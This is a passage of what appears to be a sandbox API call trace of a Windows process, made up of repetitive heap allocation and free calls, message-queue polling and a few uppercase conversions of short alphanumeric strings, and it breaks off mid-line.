RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0206.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0206.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0206.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0206.110] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0206.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0206.110] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0206.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0206.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0206.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0206.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.112] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0206.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0206.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.114] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0206.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.114] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0206.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.115] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0206.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0206.115] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaade0 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0206.115] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.116] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0206.116] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0206.116] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0206.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0206.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0206.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0206.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0206.117] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab40 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0206.118] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0206.118] RtlAllocateHeap 